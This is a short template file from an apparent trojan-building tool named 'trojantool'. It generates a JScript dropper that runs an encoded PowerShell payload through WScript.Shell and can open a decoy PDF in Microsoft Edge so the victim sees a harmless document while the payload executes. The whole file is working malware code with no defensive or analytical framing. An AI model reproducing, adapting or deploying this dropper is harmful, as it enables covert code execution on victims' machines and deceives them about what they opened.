trojantool/cmd/jscript.gojs

var base64EncodedBinary = "{{.Encoded}}";

var shell = new ActiveXObject("WScript.Shell");
var command = "powershell.exe -encodedcommand " + base64EncodedBinary;
shell.Run(command, 1, true);

{{if len .EncodedDecoy}}
var dataUri = "data:application/pdf;base64,{{.EncodedDecoy}}";

var shell = new ActiveXObject("Shell.Application");
shell.ShellExecute("msedge.exe", dataUri, "", "open", 1);

{{end}}

{{/* vim: syntax=javascript */}}